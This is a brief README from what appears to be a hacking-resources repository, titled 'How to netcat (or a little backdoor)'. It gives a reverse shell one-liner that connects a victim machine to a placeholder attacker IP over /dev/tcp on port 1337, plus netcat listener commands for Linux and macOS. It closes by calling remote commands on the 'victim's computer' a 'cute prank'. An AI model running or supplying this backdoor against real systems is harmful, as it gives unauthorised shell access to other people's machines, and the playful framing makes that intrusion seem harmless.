Mia von Steinkirch 9ed0254149 docs: Clean up resources for Hackoctoberfest 2019 (#41)
* Clean up resources for Hackoctoberfest 2019

* 👩🏾‍🦱 Add cloud hacking readme
2019-10-29 18:41:32 -07:00

359 B

How to netcat (or a little backdoor)

Create the reverse shell in the port 1337:

$ sh -i >& /dev/tcp/ATTACKERS_IP/1337 0>&1

Now just netcat to it. From a Linux machine:

$ nc -l -p 1337

Or from a Macbook:

$ nc -l 1337

You should get shell. A cute prank is making the victim's computer talk:

$ say Hacked